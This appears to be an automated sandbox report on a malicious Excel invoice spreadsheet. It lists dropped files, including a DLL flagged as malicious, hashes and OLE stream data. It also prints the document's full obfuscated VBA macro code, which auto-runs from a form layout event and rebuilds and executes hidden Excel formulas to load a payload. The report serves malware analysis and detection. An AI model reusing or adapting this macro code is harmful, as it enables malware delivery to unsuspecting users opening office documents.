Size (bytes):	1392
Entropy (8bit):	3.163794334243885
Encrypted:	false
SSDEEP:	24:bpll/+mANFssWtAFuoqquwGuNl/rkQaHke5PGqJcP+q7g5g0/D/UIOlhXU:1ll/+N6AuoZuDMlU6+24IIOjXU
MD5:	C23C2CB0AC8870BA2D7A92D96A5C3420
SHA1:	93FE60278681E0D0C176645B609A24BC62B1FCE9
SHA-256:	2088A32187446B5C244EC82A7055CAD344C1F2E7ED2FD6E73BB3E40B1CC1A67A
SHA-512:	20A51FC941CB0A7071CAE99785CA6820B8F5D073AD9D5A5C75A4E884253C70982BD72D3F6EBA2F167BBEE41E338A5AF073F742EEC711F9E7111FFDA5152675D0
Malicious:	false
Reputation:	low
Preview:	MSQMx........5,.................g..........................&.......9................................................................................V.......EXCE........................................5...g.......;...........<...........A...........l...........................z...'!......................'!..........e...........e........................................................................`........... ..................................U...........a...b...........N....................`..C...........F...........W.......DA...........@......................- ..........- ..........- ..........- ..+...........0....... ...:....... ...;....... ...........b...............................................X...........X.... ..........:!....... ..n"...........".......@...".......@...".......@...".......@...".......@...".......@..7#...... ...?...j...X.......j...X...........e.......9.... ......<...B............@../...................w`../.......................$...$............@..n370....w`..

C:\Users\user\AppData\Local\Temp\Cab35C0.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206812191244806
Encrypted:	false
SSDEEP:	1536:cGSLgQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c7BNSk8DtKBrpb2vxrOpprf/nVq
MD5:	79ACF2719DAC45A44EDF4D3DCA6AB037
SHA1:	1F88A4B82DAF8ED65839BA35BAC0E149CBDC371F
SHA-256:	026D105273980DB35AF04B25470B59480B09F204229B76FBD12541E7CD588388
SHA-512:	5F31827A2DE40F1866E30BB7E3A36C1912D6EBD11330F6E7B33233366BB49076C8B5801CBDADE71BEDA53C7EFAC354F99CB72F44E9F7BB95B72E7BEE6522F7C1
Malicious:	false
Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\Tar35C1.tmp Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\WER4960.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\System32\DWWIN.EXE
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	3110
Entropy (8bit):	3.677764698836754
Encrypted:	false
SSDEEP:	96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3IIj3:Wl7LBNuhhgG45nv5lD
MD5:	FA8FD1AB99C64263B25A5078306E7258
SHA1:	3F60633349BCDA67D767B24FE6546F3C964928A5
SHA-256:	712A58072649026F50E8B0D1B5A85CDFFD1007D06B75FA4EC371BE62B7D39AFE
SHA-512:	7AE56D401FEA1E8B0D17BD89F444C1D2DDC60C401382623BF5D145365106C6F3CDACC7780714701C19875BFD93888CEDE24E103E9977CF5AFC88D0DDADBDB149
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.

C:\Users\user\AppData\Local\Temp\lwjmdgav.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	319488
Entropy (8bit):	7.125176562164236
Encrypted:	false
SSDEEP:	6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
MD5:	597B02A17B8C012E25FA0A668004163B
SHA1:	424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
SHA-256:	E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
SHA-512:	C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................\|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...\|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 14:40:00 2021, atime=Tue Jan 12 14:40:00 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.466053005520158
Encrypted:	false
SSDEEP:	12:85QMtCLgXg/XAlCPCHaXtB8XzB/6sU1X+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJU:85RtU/XTd6jUseYe11CDv3qtrNru/
MD5:	7D2E1392D21BFDB63A02967DAF8F3EA1
SHA1:	B6372166FBA7F4D23C48D0B525871B2CFAE591EA
SHA-256:	68A16DBEB58774F7E0B5BEF3EA7B9A2BB54AF9EB844D83A83E7EE971822FF450
SHA-512:	4A9745AEAB0BEE634602F53D050FA8B85D5BE18C99F01C23190F93E8E3A98F9E3D566536E75E3C92595086BB782C30C9166CE3CDC970DD1D288A729EDE138E2E
Malicious:	false
Preview:	L..................F...........7G.....0.......0..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....,R.}..Desktop.d......QK.X,R.}..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Inv0209966048-20210111075675.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Tue Jan 12 14:40:00 2021, atime=Tue Jan 12 14:40:08 2021, length=116736, window=hide
Category:	dropped
Size (bytes):	2208
Entropy (8bit):	4.48517017590225
Encrypted:	false
SSDEEP:	24:8Nn0/XTd6jFyZe110nxJWDv3qtdM7dD2Nn0/XTd6jFyZe110nxJWDv3qtdM7dV:86/XT0jF8nxJ9tQh26/XT0jF8nxJ9tQ/
MD5:	8AA71395F36DD05D7F678BDDFE5E0F85
SHA1:	5F1CF53E665E4A8E68E7E989BCDFE7242172E5CD
SHA-256:	9C8EF792AF8253F0D968B1F7524E7BF7096AB230916E36FA256E9D540969C6F5
SHA-512:	D657EDD9DFDFA639EC8093A1435C652E1B5BCB5513F8D776BF08E455B4C4E51966CFE0FA9903FC69FAE01F3BB38091CF049C3387E26AD9B2D9320D702FB429B0
Malicious:	false
Preview:	L..................F.... ...>q...{.....0.......4.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..J..,R.\| .INV020~1.XLS..n.......Q.y.Q.y...8.....................I.n.v.0.2.0.9.9.6.6.0.4.8.-.2.0.2.1.0.1.1.1.0.7.5.6.7.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\Inv0209966048-20210111075675.xls.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.v.0.2.0.9.9.6.6.0.4.8.-.2.0.2.1.0.1.1.1.0.7.5.6.7.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	137
Entropy (8bit):	4.492055563388153
Encrypted:	false
SSDEEP:	3:oyBVomMAVFtTJGVKd0LT3tTJGVKdmMAVFtTJGVKdv:dj6A3hEKU7hEKZA3hEKt
MD5:	5CE2708381A90ED1D526BE053A53D751
SHA1:	A954E918482248CC0536EBE0CFA342BA6FB1AD2B
SHA-256:	1A300C84B22416BF6CB9056F99C0B14D664513A9EF079AAF8FC3000D70063485
SHA-512:	2B7C3A8BD0D3FD2C7CA6241CF30D1EB83E79C389F6D9B1DBB2A7297F7D85716D50D436DB04ABFB462582F94FE40B0B70B0CD0F02A9ED9526D962796C56306C5F
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..Inv0209966048-20210111075675.LNK=0..Inv0209966048-20210111075675.LNK=0..[xls]..Inv0209966048-20210111075675.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	111
Entropy (8bit):	4.492288417144315
Encrypted:	false
SSDEEP:	3:GmM/2qARclSEaDqlEapQvhKiL0cSXJzdaSmf3cX:XM/2aixhKolk9ESX
MD5:	5BDB156BC8D2594BFF328E256D968F80
SHA1:	8ACFD6C11D2E7CFF78EFC39B84AE79141C57B568
SHA-256:	DAE9AA8B5A1AF68AAFF70D8E1045447B2AA05154C57F6BF27581996CA9FB3DD0
SHA-512:	B3FC4EB0C4B50CA110F7C5C9D1F4856341EDC5BA254A5A19556D176CFB9E5C7D5ED087EBC37F19BBE13CC5FFB3321F1277B426FC56A63DEF828882878E791A14
Malicious:	false
IE Cache URL:	scrollx.in/
Preview:	__cfduid.d65b0ee49a1b7baa363fc46fc16c8cadd1610433585.scrollx.in/.9728.2941374080.30867520.707499465.30861561.*.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Dec 7 14:38:21 2020, Last Saved Time/Date: Mon Jan 11 14:30:19 2021, Security: 0
Entropy (8bit):	5.061929529755134
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Inv0209966048-20210111075675.xls
File size:	78336
MD5:	91baa6aad9201c0ccf3553a5b49eb967
SHA1:	9c182826d5dc041970f31a8d584580f870c3996c
SHA256:	01af3b5c1e2ed68272f542233aece70269a9e977815347a4b9c86bb2d97c086e
SHA512:	6f610455f741694b2179c7bbf5b6fbeb48cee48a3097f7b4d0e9bb3242c783dbd2b672c0f03874bf595080ef7e4b65feb02cc1a36896a8ae402d2a24d93f198f
SSDEEP:	1536:iwhWFk3hbdlylKsgqopeJBWhZFGkE+cL2NdAzLitpFa5i1jp5lGDl+AlmIa00md7:iwhWFk3hbdlylKsgqopeJBWhZFGkE+cH
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Inv0209966048-20210111075675.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:
Last Saved By:
Create Time:	2020-12-07 14:38:21.412000
Last Saved Time:	2021-01-11 14:30:19
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 3215

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	3215
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Integer:
bycilke()
VB_Name
MiV(sem.value)
homepodd()
homepodd
Error
Integer)
bycilke
Function
ol).Name
"!"):
String
"ab":
Split(govs,
Randomize:
yellowsto(yel
Next:
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
yellowsto(Oa))))
Integer
yellowsto
ol).value
nimo(Int((UBound(nimo)
Replace(Vo,
Chr(sem.Row)
Sheets(ol).Cells(homepodd,
"ab"))
Split(kij(ol),
yellowsto(homepodd))
Rnd))
(Run(""
"moreP_"
Variant)
Attribute
Resume
pagesREviewsd(Optional
ecimovert(nimo
ecimovert
MsgBox

VBA Code

Attribute VB_Name = "Module1"

Function homepodd()
homepodd = 5 - 3
End Function

Function pagesREviewsd(Optional wq As Integer) As Integer
Dim O As Integer: Dim Oa As Integer: ol = 1
Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab":
Dim MiV(44563)
For Each sem In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
MiV(sem.value) = Chr(sem.Row)
Next
For Each nog In MiV
govs = govs + nog
Next
Oa = 9: kij = Split(govs, "!"): Ada = Split(kij(ol), yellowsto(homepodd))
For Each Vo In Ada
Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))
On Error Resume Next:
MsgBox (Run("" & bycilke & "ab"))
Next: Oa = 2:
End Function
Function bycilke()
bycilke = "moreP_"
End Function
Function ecimovert(nimo As Variant) As String
Randomize: df = 2 - 1: ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))
End Function



Function yellowsto(yel As Integer)
yellowsto = "$"
If yel = 2 Then yellowsto = "]"
End Function

VBA File Name: Sheet1.cls, Stream Size: 1639

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1639
Data ASCII:	. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
Data Raw:	01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Index
VB_Name
VB_Creatable
Application.OnTime
VB_Exposed
Long)
ResizePagess()
VB_Customizable
"REviewsd"
VB_Control
MultiPage"
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
ResizePagess
"pages"

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"
Sub ResizePagess()
Application.OnTime Now, "pages" & "REviewsd"
End Sub
Private Sub view_1_a_Layout(ByVal Index As Long)
a = 488: ResizePagess
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 284

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	284
Entropy:	2.99555015364
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ . . . . . p r i c e l i s t . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a8 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	168
Entropy:	2.89626404454
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . x . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . @ . _ . . . . . @ . . . . . J I & . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 4c 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 1e 00 00 00

Stream Path: MBD00102510/\x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	MBD00102510/\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
